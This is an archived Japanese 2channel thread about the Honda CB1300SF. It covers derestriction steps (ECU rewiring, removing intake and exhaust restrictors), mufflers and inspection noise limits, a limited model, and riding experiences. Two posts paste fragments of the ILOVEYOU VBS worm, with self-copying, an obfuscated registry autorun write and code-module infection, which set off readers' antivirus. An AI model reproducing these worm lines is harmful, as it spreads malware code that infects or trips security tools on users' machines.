2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

CB1300SFを語ろう Part3

1 :774RR:04/07/20 22:15 ID:duqxaDUn
暑いけどみんながんばって走りまくり、レス付けまくりましょう。

2 :カワ('∀`):04/07/20 22:16 ID:LNryH9h0
ヽ(・∀・)ノウンコー

3 :デ〇ラー:04/07/20 22:17 ID:UJv8ufGS
なんでカワさんいるの?

4 :デ〇ラー:04/07/20 22:19 ID:UJv8ufGS
フルパワーにしましょう!!

1:エアファンネルを欧州用に交換
  これが一番大変。これができれば後はたいした事はないと思う。
  FIをはずす。FIをはずす為には、結果的にテールカウル、リアフェンダー、
  タンクなど、かなりはずす必要がある。
  自分の場合はタンクとFIは面倒なので外さず横からファンネルケースのふたを強引に抜いた。
  それでもリア周りは全部はずす必要はあった。
  ちなみに部品の品番は 17225MCZ010 ×2個(一個で2気筒分の為)

2:ECU配線変更
  A:シート下収納BOXの底のネジを外してECUユニットを出す。
    グレーと黒のカプラーがあるので抜く。
    グレーのカプラー側の#8番オレンジ/白の配線を抜く(裏からピンでうまくつつくと抜ける)
    それを隣の黒のカプラー側の#28番に刺す。(黄色/黒とピンクの配線がある
    間が3つ空いていて、その真中が28番)
  B:ECUユニットの近くにある赤い四角の小さなカプラーに繋がっているオレンジ/白
    の配線を切る。
    切った線のカプラー側はビニールテープなどで止め。
    逆側の切った線を同じく赤カプラーに繋がっている黒/白の線の皮を一部向いて半田など
    でT型にくっつける。


5 :デ〇ラー:04/07/20 22:21 ID:UJv8ufGS
フルパワー化でつ

3:エアクリーナーのインナー除去
  右のサイドカバーを外すと長方形のエアインテークがあるのでまず一旦はずす。
  これにエアの吸気量を減らす為のゴムの部品が刺さっている。ボンドでくっついているので
  うまく削るなりしてはずす。入り口の周りにしかボンドはついていないのでそんなに大変
  ではない。

4:ノーマルマフラーの排気デバイス撤去またはマフラー交換
  これはマフラー交換しちゃえば問題無し。
  ノーマルなら、サイレンサー後ろの蓋を外して排気デバイスをとっぱらい、繋がっているワイヤー
  も抜いて、抜いた穴を同じ径のボルトで蓋をして終わり。
  ちなみにワイヤーを引っ張るための車体側のエア駆動部品もその気になれば簡単にはずせます。 
  部品を外し、チューブが二股になってるのを一つにしちゃえばOK。
  面倒なら駆動部品はそのままで。


6 :デ〇ラー:04/07/20 22:22 ID:UJv8ufGS
ちなみに300キロは出ませんよ

7 :774RR:04/07/20 22:26 ID:w4mWcbsL


8 :774RR:04/07/20 23:09 ID:1GcLCukN
CB1300SFを語ろう Part4のまちがいじゃない?

9 :デ〇ラー:04/07/20 23:25 ID:UJv8ufGS
>>8

ホントだ  どうしましょう?  まあいいか

10 :774RR:04/07/21 08:31 ID:ip+nfWBV
気にするな〜
こう暑い日が続くと何でもいいや〜

11 :774RR:04/07/22 10:44 ID:gRLlK92X
ビッグワンのスレッド誰か立ててくれ〜。笑

12 :774RR:04/07/22 13:41 ID:1TMpajQQ
CB1300スペシャル
http://www.dream-chubu.co.jp/other/cb1300sp.html

13 :774RR:04/07/22 14:01 ID:j8nc1KEa
>>12
工エエェェ(´д`)ェェエエ工

散々待たされてコレかよ
縦目2燈でないのかよ!!
アンダーカウル無しかよ!!

14 :774RR:04/07/22 17:45 ID:AkwPo+JF
>>12
高!

15 :774RR:04/07/22 18:04 ID:6XGbuGb7
高いし あまり格好良くないな〜

16 :774RR:04/07/22 18:09 ID:V5BK4w9l
かなりかっこ悪いな・・・

17 :774RR:04/07/22 18:09 ID:d68BVNV4
漏れ的には欲しい1台だな。
んだが、やっぱり高過ぎるな
値段だけ見ればGSX-R1000ヨシムラ8耐モデルと大差ないじゃん

18 :774RR:04/07/22 19:40 ID:AkwPo+JF
うん。これだけの値段なら、ブレンボキャリパー オーリンズサスペンションくらいついて、初めてお買い得感がある。

カウルとマフラーとハンドルとヘッドライトでこの値段は全然お買い得感ないし、これだけ出すなら素直にスーパースポーツに乗る

19 :774RR:04/07/22 21:06 ID:AyQpfXEp

・・みんなホントは欲しいクセに・・

20 :774RR:04/07/22 21:11 ID:j8nc1KEa
>>19
これなら素の1300SF買って、アフターパーツで組んだ方が絶対安いよ
重ねてイラネ

21 :03乗り:04/07/22 21:42 ID:pPs6ZBBI
フルパワー化した方へ 6500RPM過ぎるとキーンとFIから音がしませんか?

22 :774RR:04/07/22 21:55 ID:NdPcWiGB
大型にはほとんど興味無いんだけど、なぜかCB1300SFには引かれる物がある。
そんな俺は小型免許までしかないV100乗り・・・。

23 :デ〇ラー:04/07/22 21:58 ID:OTyAMVc9
>>22

いつの日か所有してね

24 :デ〇ラー:04/07/22 21:59 ID:OTyAMVc9
>>21

明らかに不調でつ?

配線ミスかな?

25 :774RR:04/07/22 22:55 ID:pPs6ZBBI
スピードは200オーバーは出るし、エンジンも8000rpmまでストレスなく回るし、ただ フルパワー化を自分でやったので多少不安はあるけどかれこれ6ヶ月乗って問題がないけど もう一度結線でも調べてみます!

26 :774RR:04/07/23 17:27 ID:ElR+Ftzy
週末だ〜
みんなはどっか行くの?

27 :774RR:04/07/23 18:12 ID:r0aTuUlF
蜂隊!

28 :774RR:04/07/23 22:31 ID:cAt03Qhk
バイク関係イベント情報

ttp://www.bikebros.co.jp/news/event/index.html

むちゃくちゃ暑いから、出る気が失せるねぇ。

夕方になって涼しくなってから、夜景スポットにコーヒーでも飲みに行くとかかなぁ。

29 :774RR:04/07/24 21:36 ID:Vr0infhh
ハンドルを替えたいんだけど誰か教えて、初心者で初めてのバイクなんで。身長187センチ 

30 :774RR:04/07/24 22:55 ID:Q+qAXH6h
>>29
ショップにまかせるのか
ケーブル換える必要があるほどのアップハンにするのか
セパハンにするのかで難易度が変わってくるけど…
ブレーキラインの変更が一番のネックだね。
エア抜きなんか自分でこなすぐらいなら簡単だけどね。
俺はかなりのアップハンにしたんで
ブレーキライン、クラッチライン、
アクセルケーブル、ハーネスすべて換えたよ。
あとスイッチ関係の取り付けの際の
ハンドルバーへの穴あけとかもしないとね。
穴あけないでバーにテープかなんか巻いて
固定する人なんかもいるしね。
セパハンだとトップブリッジも換えないと見てくれ悪いしね。

31 :774RR:04/07/24 23:54 ID:FRRViUko
Super Four DREAM SPECIAL ダサッ

32 :774RR:04/07/25 00:20 ID:jZsIvLxA
どうせ出すつもりならホンダが本気でこのぐらいの仕様で作って欲しかった。
それにしても高くて手がだせないよ。
ttp://www.ismylife.com/eros/src/1090682060480.jpg

33 :774RR:04/07/25 01:23 ID:XlaZnLPz
8耐仕様すらカコイイとは思わんかったけどな。
速そうだなとは思ったが。。

34 :774RR:04/07/25 14:22 ID:efwGDfOS
>>32
カコイイ

35 :774RR:04/07/25 18:29 ID:Q0F6nE4o
Project Big-1早くもさようなら?

本家も鳴かず飛ばずカヨ

36 :774RR:04/07/25 20:43 ID:rJQBKaCU
初めてバイク買うのだけど、最初の一台として向いてますか?
主な使用用途は今は大学生なので、通学用として、卒業後は通勤用にと考えています!!
やはり最初400か750あたりのほうがいいでしょうか?

37 :774RR:04/07/25 21:57 ID:SILsp2di
珍走御用達バイクage

38 :774RR:04/07/25 22:47 ID:rJQBKaCU
初めてバイク買うのだけど、最初の一台として向いてますか?
主な使用用途は今は大学生なので、通学用として、卒業後は通勤用にと考えています!!
やはり最初400か750あたりのほうがいいでしょうか?




39 :774RR:04/07/25 23:00 ID:edGStYKB
>38
欲しけりゃ買いなよ。

通勤通学につかうだけならカブでいいんじゃないの?

> やはり最初400か750あたりのほうがいいでしょうか?

400でもコケルときゃコケルし、死ぬときゃ死ぬよ。
余分な金出して欲しくも無いものを買うのは金の無駄。
安いかいもんじゃないんだから、本当に欲しいものを買いなよ。

40 :774RR:04/07/25 23:28 ID:u/lXd6qe
ステップアップがどう乗っていう人いるけどさ、なんだってすぐ乗れるよ。
まあセンスのあるなしは関係あると思うけどね。免許取れたんなら普通に乗れるさ。

41 :774RR:04/07/26 00:23 ID:mDYbeg8N
ワイバン+フルパワー化でエンジンの性格が、かなり変わった。

好みの問題もあると思うが、かなりウマ〜。

下も扱いやすくなって良い。

42 :774RR:04/07/26 21:22 ID:c1Ds/nVw
現行のCB1300はセンスタやらマフラーがコーナー中に地面に接地するようなことはありますか?


43 :774RR:04/07/26 22:22 ID:TCPPwuPL
>>41
ワイバンかぁ、いいなあ。
でも車検は通らないよね、最近の広告では音量94db以下って記載無くなってるし。

44 :774RR:04/07/26 22:29 ID:nXqSd/2x
>>43
車検?通るんじゃない?
少なくとも俺のは通ったよ。

45 :774RR:04/07/26 23:17 ID:VV7Lekds
04型は94db以下じゃないとNGだね
車検証にも書かれているから94db以上だとJMCAでもNGだね
まっ 車検の時に純正に戻せば問題無いね〜あと問題は取り締まりですね



46 :774RR:04/07/26 23:25 ID:llv5ZTCM
このバイクって乗りやすい?


47 :774RR:04/07/27 00:03 ID:SXFSrnA6
車の馬力規制(280馬力)が解除されたから
CB1300でも車をリードできなくなるかも〜

48 :774RR:04/07/27 00:07 ID:stvepnnX
 
= = = = = = = = = = = = = =

1946年10月、本田宗一郎、当時の戦後繊維“ガチャ万”成金ブームに乗ろうと
機織り機製造会社「本田技術研究所」を浜松に設立。

まもなく簡易エンジン付き自転車[バタバタ]を製作したところ、
浜松の多数の闇市業者の足として売れ、
以後本田技研は二輪車製造へ業務を変更、現在に至る。

ヤミ屋相手の商売という地元の風評から逃れるべく、1951年東京北区へ工場移転する。
1954年、放慢設備投資により不渡りの危機に陥るが、
専務・藤沢武夫、ホンダの売名策として「マン島宣言」を発案、
これの対マスコミ・大衆への大宣伝が成功、倒産を免れる。

= = = = = = = = = = = = = =
 

49 :774RR:04/07/27 00:33 ID:i2ySbrhD
>>47
加速なら、少々じゃ負けない
最高速なら、280ps なくても十分負ける

50 :774RR:04/07/27 01:10 ID:zdKCiXyx
>45

購入時に樋渡社長自ら車検はそのまま通ると言っていた。
カタログにも94DBと記載があるぞ。

って言うか通るよ。(いつまでかは別だけど、新しいうちはね。)

51 :774RR:04/07/27 01:46 ID:LS+gEKxQ
てかCB1300と金翼どっちが速いの??

52 :774RR:04/07/27 07:51 ID:rqq3hVUG
>>47
馬力規制が解禁されても
280馬力を大幅に超える車は
ほとんど出ないと思う。
500馬力オーバーを素人ドライバーが
扱えるわけがないのでメーカーも考えるでしょ。
下道の加速では車に負けることはないかと。

>>51
見ればわかるだろ。

53 :774RR:04/07/27 08:16 ID:RmxFsnU8
このバイクって取り回しは重いの?
購入を考えているのですが、なにかアドバイスください

54 :774RR:04/07/27 08:37 ID:Qxh0dLRl
>>42
ジムカーナで使ってるけど、ステップを擦りまくりですよん。
ネイキッドなんだから、バンク角はこんなものでしょう。多くを求めちゃあいけない。

55 :774RR:04/07/27 23:52 ID:ESO3x+/0
このスレ なにかと、ワイバンマフラーをすすめるけど、 そんなに良いマフラーとは思わないんだが。
いや、決して悪いマフラーではないんだけど、値段を考えると、そんなに両手をあげて大絶賛するようなマフラーじゃない。

56 :774RR:04/07/28 01:07 ID:SmZOVYov

好きなマフラー付けたらいいじゃない。 自分がお金出すんだから。

57 :774RR:04/07/28 05:11 ID:dKbh4dVZ
03〜CB1300SF用にツインマフラーってないの?

58 :774RR:04/07/28 08:01 ID:PW7m4IOW
>>57
一応あるけど、せっかく軽くなった'03をわざわざ重くするのはいかがなものかと…。

59 :774RR:04/07/28 14:19 ID:plN6i+d4
>>45
取り締まりが問題になるような違法物を公道に出すなボケ

60 :774RR:04/07/28 14:45 ID:bPUkN4EM
>>59
説教親父キタ━━゚+.ヽ(≧▽≦)ノ.+゚━━ ッ ! ! !

61 :774RR:04/07/28 16:46 ID:0ubWD3xZ
>>57
忠夫で出してなかったっけ?
マフラーも安くないから、色々迷う・・・
結局何が良いのか・・・
リリースされている全メーカーの音を同じ場所で聞いてみたいですね

62 :774RR:04/07/28 17:04 ID:AA0rHPEm
俺は03’CB1300だけど
ストライカーレーシングコンセプト付けてる。
跳ね上がった楕円サイレンサーがかっこいい。
フルパワー化しているけど、とろいシフトアップ時にアフター結構出る。
すばやくシフトアップすればOK。
作りは猥番のほうがいい。
性能は
低回転域:適度にスカスカになったからラフなアクセルワークでもギクシャクしなくなった。
中回転域:ノーマルちょい上
高回転域:結構パワー出てる。

音は思ったほどうるさくない(カタログ上は100dbくらいだったかな)

今まで俺以外に付けてる奴見たこと無い。(寂)

63 :774RR:04/07/28 18:41 ID:dKbh4dVZ
>>58

ツインでノーマルより軽いマフラーってないの??

64 :774RR:04/07/28 19:27 ID:fbdeEonZ
>>52

わかんないよ。
どっちも速そうじゃん。
どっちが速いの??

65 :774RR:04/07/28 20:32 ID:sviTCLFc
>>64
排気量がダンチですよ
回したってこっちは馬力規制だし・・・

66 :774RR:04/07/29 22:56 ID:XppLweP8
>>64
バトる車によるって言うか腕次第。
CBだって馬力規制受けてもゼロヨン11秒台?なんだから
その辺のしょぼい走り屋仕様の四輪には負けんよ。
そこそこの腕があって車がフル加速する迫力にビビらなければOK。
スレ違いだから車vsバイクスレに行ってみなさい。

67 :774RR:04/07/30 19:02 ID:unNNS/iG
>>29
初心者で初めてのバイクがCB1300かよ…

68 :774RR:04/07/30 20:15 ID:C8Ly04SZ
>>66
良く読め
比較対照の
金翼とはGold wingの
ことだぞ

1800シーシー

69 :774RR:04/07/30 21:31 ID:g4yQ7pjJ
CB1300ってこんな小さかったっけ?
なんか窮屈だな。

70 :774RR:04/07/30 22:10 ID:zZjZcj4D
>>69
これで窮屈ならあなたに合うバイクはほとんどないかと……

71 :774RR:04/07/30 22:30 ID:g4yQ7pjJ
いや、他のバイクよりはまだマシなんだけど・・
もう一回り大きいほうがいいんじゃないかな。
エンジンも直列5気筒1500ccぐらいにして横にはみでてるほうがいいよ。うん。
もちろんマフラーは二本だしね。
タンクもあと10cmは長くしたいね。
タイヤは190

こんぐらいがいいね。
だって後ろから見たらスペック3と見分けつかないもん。

72 :774R:04/07/30 22:41 ID:Q8/G4rpf
>>71

それならX−4がいいんでないすか?

73 :774RR:04/07/31 10:48 ID:1q1DvRO5
1300CC?チンコアツクネーノ?

74 :774RR:04/07/31 12:47 ID:8kM/ewS8
>>73
チンコハアツクネーケドスネガアツイヨ

XJRが空冷だから熱い、とかいう書き込みを何回か見たけど、
CBのほうが体感的に4倍熱いね。
冬はありがたい。

75 :774RR:04/07/31 12:54 ID:gtjuKEy6
>>73
ふっ俺のチンコのほうがもっと燃えてるから熱いぜ

ガソリンが減ってきたらタンクが熱くなってなかなか厳しいかも

76 :774RR:04/07/31 17:05 ID:HrSs1cPZ
>>68
テストデータでは加速も最高速も圧倒的にCBが速いみたい。
GW1800はゼロヨン13秒、最高速206km/hです。

77 :774RR:04/07/31 17:47 ID:ctI1Jyjg
04のSF用社外エアクリーナーって売ってます?
K&Nのが欲しいのですが。

78 :774RR:04/07/31 19:09 ID:2AoeF4aD
100台限定のやつカウルだけ売ってくれるのかな?


79 :774RR:04/07/31 20:01 ID:wTPuXUg4
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))


80 :774RR:04/08/01 03:42 ID:l3bYICol
ウイルスがあるとノートン様が言って以来ホットゾヌで読めなくなった。

なんで?

81 :774RR:04/08/01 03:55 ID:l3bYICol
ToInfect.CodeModule.InsertLines BGN, ADI1・・・・・・・・・・・・・に誤作動?

余計な事書くアホがいるらしい。

82 :774RR:04/08/01 08:43 ID:41+sVIQx
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

83 :774RR:04/08/01 16:32 ID:SPj302G2
04年のCB1300買いました。

マフラーを交換しようとおもってます。
最低条件は車検に通る事です。

触媒はないよね。
単に94dB以下の音量であれば車検は通ると思ってよろしいでしょうか。

84 :774RR:04/08/02 19:41 ID:K+4cFE5a
多分平気だと思うけど、ガス検次第ってとこ。

85 :774RR:04/08/02 20:21 ID:+iQtvhoP
ガス犬ってなぁに??

86 :774RR:04/08/02 20:41 ID:KoheuoFl
>>85
腹にガスが溜まった犬のこと。
毒屁を吸い込むと死に至ることがある。
この為、ガス犬の肛門には触媒の装着が義務付けられている。

87 :774RR:04/08/02 20:50 ID:iYZBomMm
http://www.ismylife.com/eros/src/1090682060480.jpg


88 :774RR:04/08/02 21:56 ID:RIsaUOAx
環八沿いのサクライホンダにドリームスペシャルが飾ってあった。
あののっぺらぼうなアッパーはかなり違和感あるな・・
どうせならフルカウルにして1100R風にすればもちっといいと思うんだけど


89 :774RR:04/08/03 16:05 ID:4nCdflqL
おすすめのスリップオン教えてくれ

90 :774RR:04/08/03 17:11 ID:GeiR78R6
>>89
デビル間が良いと思うよ〜
重低音するよ

91 :774RR:04/08/03 18:28 ID:K/3NzGUW
最新のオートバイ誌に
輸出仕様の青いアッパーカウルのやつが載ってたね
あれいいな、8耐赤白ほど派手じゃないし。

92 :774R:04/08/03 20:45 ID:cgphVx/5
>>91
そのページの上の方に載ってる
ユニットプロリンク搭載のCB1000Fの方が気になる。。

CB1300SFにもユニットプロリンク搭載されるかなぁ

93 :774RR:04/08/03 21:50 ID:LhuUID4g
>>89
最近出たモリワキ。
俺も着けたいからインプレして。

94 : ◆zABO1062r. :04/08/04 20:54 ID:ihaCAdrK
>>32,>>87

http://hobby6.2ch.net/test/read.cgi/bike/1083606352/l50

>720 名前: 話が飛んでスマソ [sage] 投稿日: 04/07/30 23:40 ID:ybfXLTXL
>CB750にCB1300 SUPER FOUR ドリームスペシャル
>http://www.dream-chubu.co.jp/other/cb1300sp.html
>のフロントカウルを装着した
>「CB750 INTEGRA」、又は
>「CB750 BOLD'OR」を見てみたい。
>
>
>
>
>一人妄想です。(;´Д`)ハァハァ


95 :774RR:04/08/04 22:45 ID:thN0yjUG
test


96 :774RR:04/08/04 22:59 ID:thN0yjUG
test

97 :774RR:04/08/04 23:47 ID:LA3Eyy86
テスト

98 :774RR:04/08/05 12:48 ID:NjSBwqk+
>>78
可能かと

99 :774RR:04/08/05 20:31 ID:gEfBaBIQ

ヽ(`Д´)ノウワァァン
雨の中カーブ手前で2速に落としたら後輪横滑り。

超恐かった。
その後、リアブレーキを使って後輪ロックに慣れる練習しました。


100 :774RR:04/08/06 00:01 ID:FSYEeBBN
やった〜100^^
俺の98CBの勝利V(^^)V

101 :元99型乗り:04/08/06 01:26 ID:uGyv40iY
>>99
個人的には03型になってから峠の下りでエンブレを掛ける際に
よくロックしてしまいます。。。
99型では1回も無かったんですけどねぇw
あと信号スタート加速&右折時に横断歩道白線で後輪が流れる事も何回か。。。

102 :774RR:04/08/06 02:05 ID:79j/gRSZ
たしかに03はリアブレーキは掛かりが急で微妙な調整が難しいね。
対向ピストンじゃないからかも・・・

>あと信号スタート加速&右折時に横断歩道白線で後輪が流れる
これはタイヤの空気圧が必要以上に高いかアクセルワークに問題がある場合がある。
因みに空気圧は標準だと高すぎるよ。
(俺はF2.3、R2.5位にしている)

103 :774RR:04/08/06 19:30 ID:kOQlOOlY
>>102
へぇ〜
早速チャレンジw

104 :774RR:04/08/06 23:17 ID:cOE6AXsw
ノーマルCB1300SFのマフラーって何dB??

105 :元99型乗り:04/08/06 23:25 ID:g7ovm57D
>>102
なるほど、ちっと空気圧下げてみますー
アクセルも丁寧にやらないとそのうちコケるかも(汗

あと、峠の下りでロックするのはリアブレーキじゃなっくてシフトダウン時の
エンブレですー

106 :E:04/08/07 00:45 ID:yJ/AfNaV
小生、ドリームスペシャルを購入検討中。
ところで、この手の限定モデルって、
どれくらい割り引いてもらうのが妥当なんでしょうか?
なにしろ、バイク買うの初めてなもので‥


107 :774RR:04/08/07 01:20 ID:emfaVGW5
>>106
釣りだと思うけどマジレス
ドリームスペシャルってディーラー限定モデルでしょ。
ドリーム店でしか買えないから、殆ど値引き無いと思う。100台限定だし。
初めてバイク買うんだったら、購入価格より、アフターサービスを重視したほうがいい。


108 :78:04/08/07 02:03 ID:qI5VC5dl
>>98
普通に純正パーツとして注文できるって事?


109 :774RR:04/08/07 12:23 ID:ATni9J3R
>>99
滑りやすい路面では1速高いギアを使った方がいいよ。

110 :774RR:04/08/07 12:35 ID:ceq2+YnF
>>108
ドリームに聞いてみたら?

111 :E:04/08/07 20:15 ID:yJ/AfNaV
レス、ありがとうございます。
釣りじゃなくて、本気で購入検討してます。
というか、とある県のドリーム店で取り置きしてもらってます。
仮契約って感じですけど。
先日、見積もりを出してもらった時点で、
(ショップの方から自発的に提示してくれる)値引きがまったくゼロだったのですが、
バイクを購入するのが初めてというのもあって、
「いきなり値引きについて言うのもあれだし‥」と思って、こちらからは何も言わなかったのですけど。
そうですか、ほとんど値引きはありませんか‥。
定価販売となると、今回の限定モデルはかなり割高な感じがしますね。
ただ、あこがれていたCBの限定モデルということで、惚れた弱みがありますが‥。
やっぱり長期ローン組んで、購入することにします。
長々と失礼しました。

112 :774RR:04/08/07 20:34 ID:gEDcEfr0
あんなカコワルイバイク
ノーマルより安くてもいらん。

なにもかもが中途半端。

113 :774RR:04/08/07 20:43 ID:p3/ZFV7A
>>111
ドリーム号購入おめ!
俺も欲しいが先立つ物がない。。
長期ローンて何年か知らんが
手放す時は高く売れるだろうから
資産的価値はあるよな

114 :E:04/08/07 21:04 ID:yJ/AfNaV
>>113
ありがとうございます。(ってまだ、購入前ですが‥)
絶対買います。そして大切に乗ろうと思います。
買ったら、またこちらに書き込みますので、その時はよろしく。

>>112
>>なにもかもが中途半端。
私はバイク好きの知り合いから、「現行CBは存在自体が中途半端。
CB買うくらいなら、ゼファーか、あるいはGSX−R1000にしろ」
と言われています‥

115 :774RR:04/08/07 21:18 ID:XAdNUeaL
>>114
112 が言いたいのは、、 ドリーム店限定スペシャルモデルが、ノーマルに比べて中途半端と言っているんだと思う。。

ゼファーは全てが古いし、車重以上に乗り味もくそ重たい。よっぽど思い入れがない限り買うようなバイクじゃない。
GSX-R1000は比較するようなバイクじゃない。

116 :774RR:04/08/07 21:18 ID:vSsSUTOF
>>114
だったらそれを買え
そんな事言いにくるな

117 :774RR:04/08/07 21:48 ID:rLuen/ob
>114
ひがむなよ〜貧乏民め ぷっ

118 :774RR:04/08/07 22:06 ID:p3/ZFV7A
>>114
サッカーアジアカップ日本代表と共に応援してるぜ!

ドリームそんなに変か?
結構いけてると思うが…
ってか、もうチート安ければ買ってた鴨!

119 :E:04/08/07 22:12 ID:yJ/AfNaV
>>115
>>116
こちらの言葉が足らず、誤解されたようです。すいません。
112の方が「ドリーム店限定スペシャルモデルが、ノーマルに比べて中途半端」
とおっしゃっているのは理解してますし、
ゼファーやGSXにしようか迷っている訳でもありません。

私が言いたかったのは、「中途半端と言うのであれば、
CBに思い入れのない者は、現行モデルも1000もドリームスペシャルも関係なく、
CBそのものに対して、中途半端、って言い出しますよ。
まぁ、そんな奴らと同じレベルにならんといて下さい。
それから、今回の限定モデルに対しても、あまり毛嫌いしないでてやって下さい」
と言いたかっただけです。

なんか、ドリームスペシャルでその辺を走ると(今のところ想像ですが)
オリジナルのCBから挑まれそうな気がして‥。
でも、なんかそれってすごく格好悪くないですか?


120 :774RR:04/08/08 00:11 ID:hsP9Ny8I
>>119
考えすぎ。
「生まれて初めて」バイク買うんでしょ?
値引きだの中途半端だの言ってないでさっさと買え!
それでガンガン走れよ。
勝負挑まれたらぶっちればいいだろ!
誰もお前みたいな大型童貞相手にしないけどな(w

121 :E:04/08/08 00:27 ID:6xOpbzId
>>120
行けば分かるさって感じですか?
ありがとうー!!

122 :774RR:04/08/08 00:55 ID:e2QXSfeA
>>117
そうだよね、貧乏人はCB買えないもの。
すぐ飽きるから買い換えしなきゃならないし。
金持ちのためのバイクだぞCBは>>114

123 :120:04/08/08 00:57 ID:hsP9Ny8I
ちょっと言いすぎた、すまん。
この手のバイクって趣味の乗り物だからさ、自分が気に入っていればOK。
他人の目なんて気にしないで、ガンガン走ってナンボってこと。

124 :E:04/08/08 01:48 ID:6xOpbzId
みなさん、レスありがとうございました。
私の不適切な書き込みはお詫びします。
なにしろ、期待やら不安やらで心が乱れぎみだったので‥
次の休みの日、正式契約して来ます。
それでは!!


125 :774RR:04/08/08 04:04 ID:tKI0yrvQ
おれもドリームスペシャル見に行った。なかなかよいね。
間違いなくいい買い物になるでしょー。
個人的にはカウルだけほしー。

126 :774RR:04/08/08 05:46 ID:pjzSvGCg
>>124
所有する喜びで満足するような馬鹿にはならずに
CBとの思い出を沢山作ってくださいね。

それと常にライディングのスキルUPを心掛け走って下さいね。

127 :774RR:04/08/08 10:46 ID:McvIyVrY
---------------2ch発■ホンダ車オフ---------------
[場所]葛西臨海公園
http://www.mapfan.com/index.cgi?MAP=E139.51.50.9N35.38.19.5&ZM=7

[日時] 8月8日 日曜日 PM3時〜PM5時半位

[参加可能車種] 『HONDA生産の全車種』
[内容]
車体紹介 純正パーツ情報 盆栽自慢w  (応急修理大会を含むw)
あとは、気ままに突発参加者で小走りでもする(?) 希少車登場は皆で拍手汁!

128 :774RR:04/08/08 14:32 ID:pJLyMEDb
ノートンウイルス検知???
このスレやばいの?
感染してるのかぁ


129 :774RR:04/08/08 14:35 ID:pJLyMEDb
詳細
ウイルス名:macro.src


130 :774RR:04/08/08 15:47 ID:mSeEFysX
>>126
すまん、俺は02限定青を買って1年過ぎましたが、何回かしか乗ってないし。
それでも幼少の頃の憧れの、
1100Fチックのこれが家にあって、たまに磨いたりするだけでも
すんごい幸せです。
あーあーコンナ親父に誰がした、どうしてなった。
さて、年に何回かしか乗らない物のために
金に物言わせてガレージでも作っちゃおうかな。
整備だけはやっておかないとな。


131 :774RR:04/08/08 15:56 ID:7zXET/qO
>128

79と82を書いたアホがいるからだが、実害のあるような事をする
能力は無いので放置して良い。

アホで良かった!!凄い人ならガクガク・・・・・。

132 :774RR:04/08/08 16:00 ID:sS2SFz9b
>>128
http://www.netpub.tsuzuki.yokohama.jp/j/security/list-www.html
HPの下段参照。

133 :774RR:04/08/08 16:59 ID:hhMZi6Ua
ディスクロック買ったのに、ブレーキディスク太すぎて入らない・・・ orz

コーナンでヤスリ買ってきて今から2mmほど削ります・・・

134 :774RR:04/08/08 17:03 ID:hhMZi6Ua
やべぇ・・・ 挫折した・・・ orz

毎日1時間削ったとして3ヶ月はかかりそうだ。

135 :774RR:04/08/08 18:11 ID:z6r9FPgU
age

136 :128:04/08/08 22:22 ID:pJLyMEDb
>>131
また、スレに踏み込んでしまったわけですが。。。

ていうことは、実害はないということでウイルスではないということですか?

買ったばかりのVAIOが心配でして。
スレ違いでしたスミマセン。


137 :128:04/08/08 22:24 ID:pJLyMEDb
>>132
ありがとうございました。

138 :シムライダーY:04/08/08 22:29 ID:7KriMy0O
CB1300といえばホンダのCMで、親子で峠を走ってるシーンは見ていて
憧れます。ここにカキコしてる皆さんが、16のときバイクに乗りたいと言ったとき、
両親の答えは「ダメ!」だった人が多いと思います。うちも、そうでした。
だから、そのCMに限らず。TVや映画、マンガで。親子でバイク乗りが
出てくると「あぁ、俺もこんなうちに生まれ育ちたかったな」って思いますよ。

139 :774RR:04/08/09 12:30 ID:DN4hkD0q
>>138
禿同!

140 :774RR:04/08/09 19:00 ID:AArdYlJ/
駄目って言われるから、かえって乗りたくなるってのがある。
俺は高校生の時から現在まで両親には「危ないからやめな」って言われ続けている。
結婚して子供が出来たら、女房、チビにも同じこと言われる。
まだ降りるわけにはいかない。
もっともっと走り込まないとな。

141 :774RR:04/08/09 20:28 ID:Dozgseb5

= = = = = = = = = = = = = =

1946年10月、本田宗一郎、当時の戦後繊維“ガチャ万”成金ブームに乗ろうと
機織り機製造会社「本田技術研究所」を浜松に設立。

まもなく簡易エンジン付き自転車[バタバタ]を製作したところ、
浜松の多数の闇市業者の足として売れ、
以後本田技研は二輪車製造へ業務を変更、現在に至る。

ヤミ屋相手の商売という地元の風評から逃れるべく、1951年東京北区へ工場移転する。
1954年、放慢設備投資により不渡りの危機に陥るが、
専務・藤沢武夫、ホンダの売名策として「マン島宣言」を発案、
これの対マスコミ・大衆への大宣伝が成功、倒産を免れる。

= = = = = = = = = = = = = =


142 :774RR:04/08/10 19:59 ID:JL+Haksv
うちの親は乗るなとは言わなかったなぁ・・
ただ、親父はおふくろに「あいつが事故って死ぬのも覚悟しておけ」みたいなこと言ったらしい。
幸い今のところ事故起こしてないけどね。

143 :774RR:04/08/10 22:42 ID:GeCTbU8Q
最近リンクをクリックしても表示が旨くいかない。
ブラクラチェックが働いて・・・・・・。

おいらだけ?

144 :774RR:04/08/11 00:14 ID:jo0r110n
俺は学生の間はバイクに興味なかったんで親云々はわからん。
今は嫁のCB400SFと同色そろえて夫婦ツーリングを楽しんでいる。
子供がバイク乗りたがったら即OKしてやれるようしっかり尊法精神を叩き込んでおこう。
いや、尊法じゃないな。モラルとマナーと、当たり前の気配りだな。

145 :E:04/08/11 01:02 ID:aHt5ynPT
フルパワーCBについておたずねしたいんですけど、
国内仕様と比べて、
○街乗りはどんな感じですか?
○80〜150`あたりの加速や巡航性能は?
○燃費は?
どなたか、どーか教えてください!!



146 :黒CB:04/08/11 07:54 ID:s47bzuoy
>>145


